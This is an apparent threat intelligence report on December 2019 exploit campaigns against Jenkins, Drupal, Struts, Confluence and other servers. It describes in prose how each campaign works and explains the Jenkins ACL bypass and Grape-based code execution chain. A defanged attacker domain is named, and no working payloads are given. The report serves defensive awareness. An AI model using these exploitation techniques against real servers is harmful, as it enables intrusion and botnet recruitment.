Security researchers at F5 Networks constantly monitor web traffic at various locations all over the world. This allows us to detect “in the wild” malware, and to get an insight into the current threat landscape.
In December 2019, security researchers detected a 100% increase in new threat campaigns as compared to November 2019. This was not surprising since attackers often increase their activity during the busy shopping and holiday season. Here’s an overview of the new threat activity.
- Three campaigns targeting Jenkins servers vulnerable to the Jenkins Script Security Plugin Remote Code Execution (RCE) vulnerability (CVE-2019-1003000).
- Two campaigns targeting ThinkPHP servers vulnerable to an RCE vulnerability (CVE-2019-11043).
- One campaign targeting Elasticsearch servers vulnerable to a Groovy scripting engine sandbox security bypass vulnerability (CVE-2015-1427).
- In addition, the following notable new campaigns were also detected:
- Atlassian Confluence Widget Connector RCE (CVE-2019-3396), web.xml. The campaign aims to identify Confluence servers vulnerable to an Atlassian Confluence Widget Connector RCE vulnerability. The threat actor instructs the server to disclose contents of the sensitive file, web.xml.
- Multiple exploits, Mirai ECHOBOT. The campaign uses ECHOBOT, a Mirai malware variant, to exploit known public vulnerabilities. The threat actor instructs the server to download and execute a malicious file from a domain controlled by the actor. If the exploit succeeds, the server joins a botnet for future use. Further analysis on this malware variant was published to F5 Labs in December 2019.
- Drupal 'Drupalgeddon2' RCE, pido (CVE-2018-7600). The campaign aims to identify Drupal web servers vulnerable to Drupalgeddon2 RCE vulnerability. The threat actor instructs the server to download and execute a malicious bash script.
- Apache Struts2 Jakarta Multipart Parser, YMUCWkU (CVE-2017-5638). The campaign aims to identify Apache Struts 2 based servers vulnerable to the Jakarta Multipart Parser vulnerability. The threat actor instructs the server to add a "YMUCWkU" header to the response with the string 'N9d1GLZpB' as its value.
- DedeCMS savetagfile RCE, shell.lib. The campaign aims to identify DedeCMS servers that are vulnerable to a Remote Code Execution vulnerability. The threat actor instructs the server to create a PHP backdoor.
Jenkins Script Security Plugin Remote Code Execution (CVE-2019-1003000)
Jenkins is a free and open source automation server. Jenkins helps to automate the non-human part of the software development process by providing continuous integration and facilitating technical aspects of continuous delivery. We've written about other threats to Jenkins automation servers, with multiple articles published on F5 Labs, the most recent in October 2019 regarding the installation of cryptominers.
On January 8, 2019, Jenkins released a security advisory1 discussing a vulnerability in Script Security. The sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements. The vulnerability was reported by Orange Tsai from DEVCORE. A detailed analysis of the vulnerability2 was made available and multiple threat campaigns were detected shortly thereafter.
To resolve a URL, Jenkins uses Dynamic Routing. This routing uses a naming convention to resolve the URL and invoke a method dynamically. For example, a URL like http://jenkin.local/adjuncts/whatever/class/classLoader/resource/index.jsp/content gets resolved in the following sequence.
Jenkins also implements an ACL policy that limits the privilege level for a user. A user’s access privilege is checked through a call to function jenkins.model.Jenkins#getTarget(). This function checks against a list of allowlisted URLs. If a user does not have the right access privilege, some pages will not render. A few examples of pages that might be blocked for a user with no read/write privileges are /login, /logout, /signup, etc.
By combining this function with Jenkins dynamic routing, an attacker can bypass the ACL policy check. For example, a URL gadget like: /securityRealm/user/[username]/descriptorByName/[descriptor_name]/ will resolve sequentially like:
All configurable objects in Jenkins extend class hudson.model.Descriptor. Moreover, any class that extends Descriptor is accessible by method hudson.model.DescriptorByNameOwner#getDescriptorByName(String).
To achieve pre-authentication RCE, Orange uses Grape, a built-in JAR dependency management in Apache Groovy. By using processOtherServices() method within class the groovy.grape.GrapeIvy, a constructor call can be made to any class. By creating a malicious JAR file and putting the class name into the file META‑INF/services/org.codehaus.groovy.plugins.Runners, a threat actor can invoke a constructor and execute arbitrary code.
Since the release of the POC exploit, we've seen this vulnerability commonly exploited by threat actors.
The initial request instructs the server to connect to aliyun[.]one and download the webpage.
Aliyun[.]one webpage contains the payload to be executed on a vulnerable server. The downloaded payload is a BASH script that instructs the vulnerable server to create a cron job to ensure its persistence. It then downloads and executes an ELF file disguised as a PNG image file.